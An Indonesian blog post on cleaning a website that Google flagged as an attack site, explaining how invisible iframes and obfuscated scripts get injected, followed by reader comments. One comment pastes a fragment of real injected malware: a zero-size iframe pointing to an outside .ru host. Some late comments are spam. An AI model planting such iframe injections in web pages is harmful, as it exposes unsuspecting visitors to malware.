Mengatasi website yang terkena “reported attack site” oleh google

Ini mungkin memang murni kesalahan saya…kenapa ? karena sudah lama saya tidak mengawasi website maca max bae yang saya buat, sehingga kemarin sore saat saya mencoba mengakses ternyata website saya dinyatakan sebagai “reported attack site” oleh google.

Waduh…kaget juga saya padahal saya merasa tidak melakukan apapun yang akan merugikan website saya sendiri. Setelah saya melihat koding dari website pada file index ternyata pada source code telah di sisipi kode “<iframe>….. nama website….</iframe>” yang oleh google dianggap badware.

Entah kerjaan hacker atau kompetitor saya sudah tidak perduli, yang penting bagaimana cara untuk mengatasi hal tersebut. Sebelumnya saya juga mencari tahu sebenarnya kenapa sih atau klasifikasi apa yang membuat google menyatakan website kita sebagai website yang termasuk reported attack site.

Google akan memberikan keterangan reported attack site kepada website kita jika melihat badware pada website kita.

Badware is software that fundamentally disregards a user’s choice over how his or her computer will be used. Many sites with badware problems are not actually hosting badware themselves, but instead exhibit other “badware behaviors” such as automatic redirects or prominent links to badware on other sites. Often these badware behaviors are the result of hacking attacks or compromised third-party content, such as ads.

Bagaimana badware bisa ada pada website kita ? yah jawabannya hanya ada 2, yaitu anda sendiri yang menaruhnya atau hacker menyerang website anda. Biasanya yang sering terjadi adalah karena yang kedua ini yang terjadi pada website saya. Bentuk badware yang menyerang website kita yang dilakukan oleh hacker biasanya berupa :

  • Invisible iframe
    iframe merupakan salah satu tag dalam HTML. Dalam kasus ini merupakan cara untuk menampilkan link menuju sebuah website yang termasuk dalam kategori badware oleh google. Biasanya tag ini akan menampilkan mini windows yang tidak terlihat oleh pengguna. Jika anda menemukan iframe with width=“0” and height=“0” pada source code website anda maka anda harus curiga bahwa itu adalah badware.
  • Obfuscated code
    Obfuscated code adalah skrip atau kode yang dibuat tersembunyi pada source code website anda sehingga akan sulit diketahui. Jika anda membuat sendiri source code web anda mungkin akan lebih mudah dikenali, tetapi jika anda menggunakan template seperti joomla dan wordpress tentu akan lebih sulit diketahui dan biasanya berupa javascript.

Lalu bagaimana cara menghilangkannya ? salah satu cara adalah dengan menghapus semua invisible iframe dan obfuscated code yang ada pada web anda dan melaporkan ke google bahwa anda sudah menghapusnya. Bagaimana cara melaporkannya ke google, pertama adalah anda kunjungi google webmaster tool kemudian login menggunakan account anda, pada menu dashboard pilih request review setelah mengklik web site anda lalu ikuti petunjuknya.

Alhamdulillah website saya sudah bersih…tapi tetap harus waspada🙂

36 Responses to Mengatasi website yang terkena “reported attack site” oleh google

  1. andri mengatakan:

    wah… Terima kasih banyak mas… Artikel yang sangat bermanfaat…

  2. tonie mengatakan:

    Mas, tolong juga lihat web saya, kena “reported attack site” trims juga artikelnya, mau di coba sarannya.

  3. Arsyad Salam mengatakan:

    nah ini nih… kasus saya persis seperti itu…
    trims atas artikel ini

  4. bongkeng mengatakan:

    masalah nya untuk tahu dimana badware itu berada, gemana bos.. site temenku juga terkena itu uy.. aku di mintain tolong untuk recover lagi…. weh.. susah juga yah kalau harus download semua dan cek satu2…
    ckckckck

  5. adang mengatakan:

    Biasanya ada pada halaman index mas… soalnya saat di browse halaman pertama yang ditampilkan pada sebuah website adalah index.php or index.html or index.asp🙂

  6. Artista mengatakan:

    web saya juga kena nih….. tapi saya coba Verify. ko…tetep ada jawaban : Kami tidak bisa memverifikasi situs Anda. Apakah Anda menambahkan meta tag pada URL berikut ini: http://www.artistarefill.com/?

    padahal saya udah sisipkan tag nya,
    mohon bantuan nya bos

  7. adang mengatakan:

    Tapi saya cek web mas sudah ok tuh tidak ada warning lagi🙂

  8. Wedhee mengatakan:

    Mas Terima kasih atas Artikel yang sangn bermanfaat bagi saya…karena website perusahaan saya juga terkena block oleh google…tapi saya belum paham betul mengenai source code website…bisa bantu gak mas….

  9. Ari Supriady mengatakan:

    TOP BGT.
    Pas Banget untuk saya…

    Thanks yo…

    salam sukses.
    Cintailah Negara kita.
    Jangan Mau Dijajah Lagi
    Apalagi oleh tetangga

  10. ben mengatakan:

    web saya juga kena Reported Attack Site, setelah saya masuk ke webmaster tool dan saya sudah ukuti petunjuknya, tetapi web saya masih ada tampilan Reported Attack Site nya.

    tolong bantuannya mas..

  11. adang mengatakan:

    apa mas sudah edit file index.php milik mas ?

  12. iwan mengatakan:

    wah sama nih kasusnya dgn website perusahaan saya…terkena badware terdapat pada index.php dengan tagnya vlsyafanxsfyggorjxkphvyzphctrsj

    Tolong dong mas di bantu untuk kasus ini karena saya sudah coba mendelete file index.php yang terdapat diserver dan sudah saya ganti password login cpanelnya. Akan tetapi tetap saja badware tersebut muncul kembali pd keesokan harinya.

    Apa saya harus pindah ke jasa layanan hosting yang lebih aman? Atau bagaimana ?
    Mohon dengan sangat untuk pencerahannya

    Terima Kasih

  13. iwan mengatakan:

    kayak gini nih…(!this.src){ this.src=’http://qualitysuper.ru:8080/index.php’; this.height=’0′; this.width=’0′;}” >vlsyafanxsfyggorjxkphvyzphctrsj

  14. adang mengatakan:

    Mas Iwan menggunakan apa untuk websitenya ? kalo wordpress memang hanya memiliki satu file index.php, tetapi jika joomla maka semua file index.php yang ada harus di cek mas…

  15. iwan mengatakan:

    saya menggunakan Adobe DreamWeaver CS3 dan memakai untuk data base PHP & MySQL

  16. adang mengatakan:

    kemungkinan masih ada di file index.php yang belum bersih dari badware…

  17. Onnay Okheng mengatakan:

    waduh..makasih kang, saya lagi pusing ngatasin ini..
    udah minta di review, tapi masih belum bener..
    wal hasil saya hapus semuanya dulu.. mudah2an berhasil..😀

    salam hangat dari bandung..😀

  18. kurniadi mengatakan:

    pertama, makasih banget nih mas tutorial’y!!
    saya temasuk orang baru nich mas dlm dunia web, eh langsung kena “reported attack site”
    mohon bantuan’y ya mas!! saya dah coba sisipin tag meta’y n hapus scriptjail’y. Tp masih lom bisa!!

  19. grandchief mengatakan:

    wah mas apakah infisible iframenya cuman dihapus aja,trus yang kedua itu giman ndeteksinya mas.Ini web pakai joomla ?Trims sebelumnya

  20. adang mengatakan:

    Ini berlaku untuk semua tidak hanya joomla, kebetulan yang kena website saya yang pake joomla kalo deteknya sulit tapi bisa dilihat via google webmaster tool

  21. yan mengatakan:

    mas punya q mungkin jg sama kyk ini deh. coz pnya q di google skrang gak ada. pdahal dulu di peringkat 1 atau 2. tp sekarang g ada sama sekali. crany gmn??
    tlng krm via email q y??
    tq.

  22. adang mengatakan:

    Kalo boleh tahu awalnya gmana website anda bisa tidak lagi di index oleh google?

  23. masslamet mengatakan:

    Thanks infonya, web temenku http://bisnissupport.com kena juga, kira-kira proses review berapa lama ya…

  24. Kak Udex mengatakan:

    AKu juga maslah yang sama nih.. akan dicoba tipsnya. Thx

  25. Abu HZ mengatakan:

    wah, blog aq jg kena neh… http://www.anekaherbal.tk
    Thanks tips nya….

  26. sucita mengatakan:

    Info yang sangat bermanfaat, siapa tahu nanti blog saya kena ( tapi mudah-mudahan nggak kena), sebab pernah juga satu halaman web saya kedatangan tamu tak diundang berulang-ulang melalui comment dan aneh, saya khawatir akan ada virus, akhirnya Permalinknya saya ubah, baru komentar itu hilang.

  27. Talitha Huriyah mengatakan:

    Aslkm, mas, tolong liat blog saya. Sudah saya coba verify terus upload berkas verifikasi HTMl.
    Tapi kalo dicek lewat google tetap masih ada tulisan
    ‘Situs ini mungkin berbahaya bagi komputer Anda’

    mohon bantuannya, terimakasih

  28. adang mengatakan:

    baik nanti saya coba lihat

  29. Talitha Huriyah mengatakan:

    Terimkasih banyak bantuannya, blognya sudah bisa dibuka😛

  30. smsc gratis mengatakan:

    terima kasih infonya . .
    dapast ilmu langsung praktek

  31. adang mengatakan:

    bagus mas…keep blogging

  32. template jeopardy mengatakan:

    Spot on with this write-up, I actually suppose this website needs far
    more consideration. I’ll most likely be once more to
    read rather more, thanks for that info.

  33. radiovalleevezere.com mengatakan:

    I know this web site provides quality dependent content and other information, is there any other web page which provides such data in quality?

  34. Pretty section of content. I just stumbled upon your weblog and in accession
    capital to assert that I acquire in fact enjoyed account your
    blog posts. Anyway I’ll be subscribing to your augment and even I achievement you access consistently fast.

  35. I think the admin of this website is in fact working hard in support of his web page, because here every data is quality based stuff.

  36. smcsmankapur.Org mengatakan:

    Hire a tax professional to help you answer the auditor questions.
    Worse than this, in our experience registrars simply don”t see anything wrong with what their auditors do. A tremendous amount of your heat leaks into your attic via the attic door.

Tinggalkan Balasan

